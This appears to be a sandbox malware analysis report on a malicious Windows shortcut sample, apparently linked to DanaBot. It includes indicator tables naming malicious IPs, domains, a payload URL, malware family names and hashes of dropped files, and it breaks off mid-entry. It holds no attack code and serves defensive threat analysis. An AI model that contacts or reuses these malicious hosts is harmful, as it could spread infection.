                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:A4FY1OA97K.lnk
                                                              renamed because original name is a hash value
                                                              Original Sample Name:0306addb386436ae663da152bee03226.lnk
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winLNK@79/70@3/5
                                                              EGA Information:
                                                              • Successful, ratio: 25%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .lnk

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 23.218.208.109, 199.232.214.172, 23.218.208.137, 50.16.47.176, 54.224.241.105, 34.237.241.83, 18.213.11.84, 172.64.41.3, 162.159.61.3, 23.195.39.65, 2.19.198.75, 23.32.238.130, 184.30.20.134, 23.32.238.163, 23.32.238.147, 23.32.238.137, 23.32.238.128, 23.32.238.89, 13.107.246.63, 52.149.20.212
                                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                              • Execution Graph export aborted for target mshta.exe, PID 6404 because there are no executed function
                                                              • Execution Graph export aborted for target powershell.exe, PID 5408 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7432 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              03:05:09API Interceptor2x Sleep call for process: svchost.exe modified
                                                              03:05:16API Interceptor159x Sleep call for process: powershell.exe modified
                                                              04:08:06API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                              04:08:11API Interceptor1x Sleep call for process: WMIC.exe modified
                                                              04:08:51API Interceptor1074137x Sleep call for process: mama.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              188.132.183.159vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                206.206.125.221vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                  94.131.118.216vreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                    150.241.97.10qx34JU8utj.lnkGet hashmaliciousUnknownBrowse
                                                                    • 150.241.97.10/aa.mp4

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    pravo-bashkortostan.ruvreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                    • 150.241.97.10
                                                                    bg.microsoft.map.fastly.netvreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                    • 199.232.210.172
                                                                    54861 Proforma Invoice AMC2273745.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 199.232.214.172
                                                                    6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                                    • 199.232.214.172
                                                                    C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                    • 199.232.210.172
                                                                    P9UXlizXVS.exeGet hashmaliciousAsyncRATBrowse
                                                                    • 199.232.214.172
                                                                    Setup64v4.1.9.exeGet hashmaliciousUnknownBrowse
                                                                    • 199.232.214.172
                                                                    0Ty.png.exeGet hashmaliciousXmrigBrowse
                                                                    • 199.232.214.172
                                                                    0442.pdf.exeGet hashmaliciousUnknownBrowse
                                                                    • 199.232.210.172
                                                                    0442.pdf.exeGet hashmaliciousUnknownBrowse
                                                                    • 199.232.214.172
                                                                    yvaKqhmD4L.exeGet hashmaliciousUnknownBrowse
                                                                    • 199.232.210.172

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    NASSIST-ASGIvreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                    • 94.131.118.216
                                                                    https://reddsuth.outfitsrl.it/?46525SU=4TI90K00DGet hashmaliciousUnknownBrowse
                                                                    • 94.131.117.116
                                                                    tmpzNIZ0YQ.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    • 95.164.16.15
                                                                    H36NgltNe7.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    • 95.164.16.15
                                                                    lat0Kwfbuj.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    • 95.164.16.15
                                                                    Josho.m68k.elfGet hashmaliciousUnknownBrowse
                                                                    • 95.164.4.65
                                                                    J5uGzpvcAa.elfGet hashmaliciousUnknownBrowse
                                                                    • 95.164.4.65
                                                                    nPRmTlXhOT.elfGet hashmaliciousUnknownBrowse
                                                                    • 95.164.4.65
                                                                    OwBugJ5CiC.elfGet hashmaliciousUnknownBrowse
                                                                    • 95.164.4.65
                                                                    H5LPetzgXV.elfGet hashmaliciousUnknownBrowse
                                                                    • 95.164.4.65
                                                                    HYPEENT-SJUSvreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                    • 206.206.125.221
                                                                    YvITZPUmfd.ps1Get hashmaliciousUnknownBrowse
                                                                    • 206.206.127.152
                                                                    K05MQ5BcC8.lnkGet hashmaliciousDucktailBrowse
                                                                    • 206.206.126.252
                                                                    eQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                                    • 206.206.126.252
                                                                    4YgQ2xN41W.lnkGet hashmaliciousRDPWrap Tool, DucktailBrowse
                                                                    • 206.206.126.252
                                                                    EERNI7eIS7.lnkGet hashmaliciousDucktailBrowse
                                                                    • 206.206.126.252
                                                                    cOOhDuNWt7.lnkGet hashmaliciousDucktailBrowse
                                                                    • 206.206.126.252
                                                                    O5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                                    • 206.206.126.252
                                                                    SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                                    • 206.206.126.252
                                                                    gW6FHWNFzR.lnkGet hashmaliciousDucktailBrowse
                                                                    • 206.206.126.252
                                                                    PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTRvreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                    • 188.132.183.159
                                                                    arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 78.135.74.199
                                                                    sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 78.135.115.141
                                                                    PO_63738373663838____________________________________________________________________________.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.132.193.46
                                                                    File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.132.193.46
                                                                    Scan_20241030.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 46.28.239.165
                                                                    dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.132.193.46
                                                                    nabm68k.elfGet hashmaliciousUnknownBrowse
                                                                    • 188.132.241.224
                                                                    dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.132.193.46
                                                                    PO-Zam#U00f3wienie zakupu-8837837849-pl-.exeGet hashmaliciousDarkCloudBrowse
                                                                    • 188.132.193.46

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    3b5074b1b5d032e5620f69f9f700ff0evreFmptfUu.lnkGet hashmaliciousDanaBotBrowse
                                                                    • 150.241.97.10
                                                                    skript.batGet hashmaliciousVidarBrowse
                                                                    • 150.241.97.10
                                                                    msgde.exeGet hashmaliciousQuasarBrowse
                                                                    • 150.241.97.10
                                                                    6ee7HCp9cD.exeGet hashmaliciousQuasarBrowse
                                                                    • 150.241.97.10
                                                                    https://www.gglusa.us/Get hashmaliciousUnknownBrowse
                                                                    • 150.241.97.10
                                                                    ERTL09tA59.exeGet hashmaliciousLummaCBrowse
                                                                    • 150.241.97.10
                                                                    GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                    • 150.241.97.10
                                                                    TTsfmr1RWm.exeGet hashmaliciousLummaCBrowse
                                                                    • 150.241.97.10
                                                                    Dotc67890990.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 150.241.97.10
                                                                    51c64c77e60f3980eea90869b68c58a8EQ5Vcf19u8.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 150.241.97.10
                                                                    EQ5Vcf19u8.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 150.241.97.10
                                                                    vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 150.241.97.10
                                                                    vwZcJ81cpN.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 150.241.97.10
                                                                    r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 150.241.97.10
                                                                    gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 150.241.97.10
                                                                    gjEtERlBSv.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 150.241.97.10
                                                                    WindowsUpdate.exeGet hashmaliciousUnknownBrowse
                                                                    • 150.241.97.10
                                                                    Hbq580QZAR.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 150.241.97.10
                                                                    steel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 150.241.97.10

                                                                    Dropped Files

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    C:\Users\user\AppData\Roaming\mama.exevreFmptfUu.lnkGet hashmaliciousDanaBotBrowse

                                                                      Created / dropped Files

                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.7067065909540811
                                                                      Encrypted:false
                                                                      SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqh:2JIB/wUKUKQncEmYRTwh0d
                                                                      MD5:9510B2A0E6DA17C44866DFB7C4DD46CB
                                                                      SHA1:D06B690EFF108193694101401437AE3CD0BB29A8
                                                                      SHA-256:3C842C934FE0260A5373684B77F0A3BCCD6466C83685FEC235E523C12E5234F7
                                                                      SHA-512:EF9AF8B0533613F1F874D7AF2443A475B80D765AC0687DA2CF77AAD0D874D2717E5973408A7ED1A4907E8B9A064FA66F36F267643B02FDA09EE0601526DA91A5
                                                                      Malicious:false
                                                                      Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x122c8b73, page size 16384, DirtyShutdown, Windows version 10.0
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.7900102357128433
                                                                      Encrypted:false
                                                                      SSDEEP:1536:LSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:LazaPvgurTd42UgSii
                                                                      MD5:AD9E2C7B3B37F2243947C944347968C8
                                                                      SHA1:58105C591179919DB2A4B9CFABC28B893109C0F8
                                                                      SHA-256:46B4162CD0FC948B0694E8F1557D3E8E285FC84F59A90A21BE8FBEB21855D4BE
                                                                      SHA-512:A9CA9E5BDAD59C7F3F4DA3634361FBF6ADCC96F29B6C606E1458F1597FE20C0870C7A753CAEC4AC871A440BB5EB009C26F9D62BE2327B2E449E2C4B7B596C06E
                                                                      Malicious:false
                                                                      Preview:.,.s... ...............X\...;...{......................0.`.....42...{5......|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................l..=.....|..................BuVR.....|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:zlib compressed data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.08182645516831169
                                                                      Encrypted:false
                                                                      SSDEEP:3:2m1KYeboe+pkqNt/57Dek3Jm3BtWApwllEqW3l/TjzzQ/t:B1Kzbz+pkqPR3tmlpQmd8/
                                                                      MD5:F82C1F9F4B80A3EAD1DA87D880ECF6FB
                                                                      SHA1:26A4D953EEF34649B7A392DB68D58DC026941142
                                                                      SHA-256:1EBD8B62A830E994A8E71C540D410291A4DDEB1DE9B389BD6E1D033C5A6AAA0B
                                                                      SHA-512:992D206EF874D67C130AD305FC8A3F9191319124AA52ED88217BDFCDB97384DEE6000F0F8E6D85E9D6D99A6E58A8D48010D0D689043583811B4A97F6B3949CEC
                                                                      Malicious:false
                                                                      Preview:(Si).....................................;...{.......|..42...{5.........42...{5.42...{5...Y.42...{59................BuVR.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):300
                                                                      Entropy (8bit):5.267969556343983
                                                                      Encrypted:false
                                                                      SSDEEP:6:2AoQL+q2PcNwi2nKuAl9OmbnIFUt85GjG1Zmw+5XQQLVkwOcNwi2nKuAl9OmbjLJ:2GyvLZHAahFUt85G8/+51R54ZHAaSJ
                                                                      MD5:983858D1D5689AE728F0BEBB97CE299E
                                                                      SHA1:511294B80BCB3DAD659B5DCAD3D1C960D66CBE5C
                                                                      SHA-256:78D855CE7ECA78F6B53B564F94D23AE08E7EC584585CE9AF91B329241B62F7C8
                                                                      SHA-512:FF2D1BE30EA82B2AE6E9EE679824B9A6FCCA9C6F8830A40BE05D4B61188EEE671ACCB7A0F359ACCFA90513043B1676D3FFE392CCBE884819D36C4987C3D3FF64
                                                                      Malicious:false
                                                                      Preview:2024/12/27-04:07:55.516 1d18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/27-04:07:55.579 1d18 Recovering log #3.2024/12/27-04:07:55.580 1d18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):300
                                                                      Entropy (8bit):5.267969556343983
                                                                      Encrypted:false
                                                                      SSDEEP:6:2AoQL+q2PcNwi2nKuAl9OmbnIFUt85GjG1Zmw+5XQQLVkwOcNwi2nKuAl9OmbjLJ:2GyvLZHAahFUt85G8/+51R54ZHAaSJ
                                                                      MD5:983858D1D5689AE728F0BEBB97CE299E
                                                                      SHA1:511294B80BCB3DAD659B5DCAD3D1C960D66CBE5C
                                                                      SHA-256:78D855CE7ECA78F6B53B564F94D23AE08E7EC584585CE9AF91B329241B62F7C8
                                                                      SHA-512:FF2D1BE30EA82B2AE6E9EE679824B9A6FCCA9C6F8830A40BE05D4B61188EEE671ACCB7A0F359ACCFA90513043B1676D3FFE392CCBE884819D36C4987C3D3FF64
                                                                      Malicious:false
                                                                      Preview:2024/12/27-04:07:55.516 1d18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/27-04:07:55.579 1d18 Recovering log #3.2024/12/27-04:07:55.580 1d18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):344
                                                                      Entropy (8bit):5.209567376064612
                                                                      Encrypted:false
                                                                      SSDEEP:6:2I9Iq2PcNwi2nKuAl9Ombzo2jMGIFUt85I0Zmw+5I/7zkwOcNwi2nKuAl9Ombzos:2lvLZHAa8uFUt85L/+5S54ZHAa8RJ
                                                                      MD5:7BE7F9F84CC6C9E56610098364E1077D
                                                                      SHA1:2CA5A647ADC1FBBF7F0696517B626FD091230008
                                                                      SHA-256:E1BF7EEC3089E428F2BEBB22D816CFC7B21079E9D92871140C3E945C04E9FADB
                                                                      SHA-512:548EE13CEE250D8EE6EE88FA27169D37AAC8410F3FA229CD4BA12D6B4DAB5CF07A8ECD0A5C2F81C9DA715CC99AF5BCE58B129E1ACB8368E063F8C815146BAE13
                                                                      Malicious:false
                                                                      Preview:2024/12/27-04:07:55.590 1e60 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/27-04:07:55.591 1e60 Recovering log #3.2024/12/27-04:07:55.592 1e60 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):344
                                                                      Entropy (8bit):5.209567376064612
                                                                      Encrypted:false
                                                                      SSDEEP:6:2I9Iq2PcNwi2nKuAl9Ombzo2jMGIFUt85I0Zmw+5I/7zkwOcNwi2nKuAl9Ombzos:2lvLZHAa8uFUt85L/+5S54ZHAa8RJ
                                                                      MD5:7BE7F9F84CC6C9E56610098364E1077D
                                                                      SHA1:2CA5A647ADC1FBBF7F0696517B626FD091230008
                                                                      SHA-256:E1BF7EEC3089E428F2BEBB22D816CFC7B21079E9D92871140C3E945C04E9FADB
                                                                      SHA-512:548EE13CEE250D8EE6EE88FA27169D37AAC8410F3FA229CD4BA12D6B4DAB5CF07A8ECD0A5C2F81C9DA715CC99AF5BCE58B129E1ACB8368E063F8C815146BAE13
                                                                      Malicious:false
                                                                      Preview:2024/12/27-04:07:55.590 1e60 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/27-04:07:55.591 1e60 Recovering log #3.2024/12/27-04:07:55.592 1e60 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\1c4da9dc-7dd3-42eb-8048-46ef21e751ba.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:JSON data
                                                                      Category:modified
                                                                      Size (bytes):475
                                                                      Entropy (8bit):4.972695042269218
                                                                      Encrypted:false
                                                                      SSDEEP:12:YH/um3RA8sqZsBdOg2Hngcaq3QYiubSpDyP7E4TX:Y2sRdsHdMHnL3QYhbSpDa7n7
                                                                      MD5:E963F2FB6304EE0D49E87CE8230F2884
                                                                      SHA1:2B51331B6CEF5B379EF0E723BE7D8839B9C93E1A
                                                                      SHA-256:9471015BB216F99E53C7236A1059D500A645222CF01A9B3D6C60BFB6D18E21AA
                                                                      SHA-512:6C87608726EC1E8839739153E8381FF52C8B72C18381D212CF31C60295C725C448A9607B301783BF775FE505F4AEDC785D554F2CCEA8C73C55B4E8DDFB2D13AA
                                                                      Malicious:false
                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379850483972398","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":642776},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):475
                                                                      Entropy (8bit):4.972695042269218
                                                                      Encrypted:false
                                                                      SSDEEP:12:YH/um3RA8sqZsBdOg2Hngcaq3QYiubSpDyP7E4TX:Y2sRdsHdMHnL3QYhbSpDa7n7
                                                                      MD5:E963F2FB6304EE0D49E87CE8230F2884
                                                                      SHA1:2B51331B6CEF5B379EF0E723BE7D8839B9C93E1A
                                                                      SHA-256:9471015BB216F99E53C7236A1059D500A645222CF01A9B3D6C60BFB6D18E21AA
                                                                      SHA-512:6C87608726EC1E8839739153E8381FF52C8B72C18381D212CF31C60295C725C448A9607B301783BF775FE505F4AEDC785D554F2CCEA8C73C55B4E8DDFB2D13AA
                                                                      Malicious:false
                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379850483972398","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":642776},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4099
                                                                      Entropy (8bit):5.235580597374808
                                                                      Encrypted:false
                                                                      SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPRKJp:CwNw1GHqPySfkcigoO3h28ytPRKJp
                                                                      MD5:E3383A88E0639EDC48E101931430800B
                                                                      SHA1:6DA88DD1A8CE4D1F6A650545050A9AC278B7DACD
                                                                      SHA-256:81CBBC708BF5F8B83419543D9A0E61F7DE10394319EE3BA4D9265B04959F8D68
                                                                      SHA-512:F6DE12E5F0CD50D1C1286DAFDDBBE05553F14AB39937C830FCA994F65FF421C8AE08818288BA8200671B60DF137A3BC77A21E3BF76CDE953E76AB08B551F9659
                                                                      Malicious:false
                                                                      Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):332
                                                                      Entropy (8bit):5.196330849964765
                                                                      Encrypted:false
                                                                      SSDEEP:6:2gUq2PcNwi2nKuAl9OmbzNMxIFUt85szZmw+5PWzkwOcNwi2nKuAl9OmbzNMFLJ:2fvLZHAa8jFUt85Y/+5ez54ZHAa84J
                                                                      MD5:D4C4BFD4EDDE9FAC296ECE575CEF0324
                                                                      SHA1:07666C9502411A113FD78F29E90DFB7BE7C6B94D
                                                                      SHA-256:FA29C86066F2CDBE4FB4BFA014F39BE287D09886F0A1100D17BF287CB5FEEA44
                                                                      SHA-512:76BCCF296973C21D955D119976726D487AD7115329222637DB3C2BE2C10A6C9082B67657CBE4F12BC99141BE1A2DFEE2CF289CF7FF74CD30E33487F843414A90
                                                                      Malicious:false
                                                                      Preview:2024/12/27-04:07:56.061 1e60 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/27-04:07:56.074 1e60 Recovering log #3.2024/12/27-04:07:56.087 1e60 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):332
                                                                      Entropy (8bit):5.196330849964765
                                                                      Encrypted:false
                                                                      SSDEEP:6:2gUq2PcNwi2nKuAl9OmbzNMxIFUt85szZmw+5PWzkwOcNwi2nKuAl9OmbzNMFLJ:2fvLZHAa8jFUt85Y/+5ez54ZHAa84J
                                                                      MD5:D4C4BFD4EDDE9FAC296ECE575CEF0324
                                                                      SHA1:07666C9502411A113FD78F29E90DFB7BE7C6B94D
                                                                      SHA-256:FA29C86066F2CDBE4FB4BFA014F39BE287D09886F0A1100D17BF287CB5FEEA44
                                                                      SHA-512:76BCCF296973C21D955D119976726D487AD7115329222637DB3C2BE2C10A6C9082B67657CBE4F12BC99141BE1A2DFEE2CF289CF7FF74CD30E33487F843414A90
                                                                      Malicious:false
                                                                      Preview:2024/12/27-04:07:56.061 1e60 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/27-04:07:56.074 1e60 Recovering log #3.2024/12/27-04:07:56.087 1e60 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241227090759Z-196.bmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                      Category:dropped
                                                                      Size (bytes):65110
                                                                      Entropy (8bit):2.149800531192087
                                                                      Encrypted:false
                                                                      SSDEEP:192:arW/0KCorycSBECzu9HLdFQqCoVsjfj5KfXKgyQQ0VTFRH0a:ar0vogCzu9HpFQq7S0NyQQ0ZH0a
                                                                      MD5:8E76B48B815EF88812C96CC62A3D7390
                                                                      SHA1:CF45768B64E9D83D7892D02ECFA90B17C03AD626
                                                                      SHA-256:0ECA97B3D5B789FEA64A38D8966BBA31C8C8C43487F352D2C02AB9F61F9EB54B
